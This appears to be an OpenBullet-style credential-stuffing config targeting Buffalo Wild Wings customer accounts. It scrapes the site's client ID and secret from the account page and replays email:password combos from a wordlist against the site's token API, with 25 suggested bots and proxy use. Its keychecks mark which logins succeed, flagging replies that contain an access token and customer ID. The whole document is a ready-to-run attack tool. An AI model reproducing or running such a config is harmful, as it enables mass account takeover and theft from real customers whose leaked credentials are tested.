[SETTINGS]
{
  "Name": "Buffalo Wild Wings",
  "SuggestedBots": 25,
  "LastModified": "2018-05-28T10:14:24.4414389+00:00",
  "AdditionalInfo": "Needs proxies, Email:pass",
  "Author": "LukaRoyal",
  "Version": "1.0.0",
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
REQUEST GET "https://www.buffalowildwings.com/en/account/" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
#clid PARSE "<SOURCE>" LR "{\"ClientId\":\"" "\"" Recursive=FALSE -> VAR "clid" "" "" 
#clisecret PARSE "<SOURCE>" LR "ClientSecret\":\"" "\"" Recursive=FALSE -> VAR "clisecret" "" "" 
REQUEST POST "https://api.buffalowildwings.com/api/v1/authorization/token" AutoRedirect=TRUE 
  CONTENT "{\"grant_type\":\"password\",\"username\":\"<USER>\",\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "x_client_id: <clid>" 
  HEADER "x_client_secret: <clisecret>" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure AND 
    KEY "Invalid email or password" 
    KEY "statusCode\": 500" 
  KEYCHAIN Success AND 
    KEY "\"access_token" 
    KEY "customer_id" 
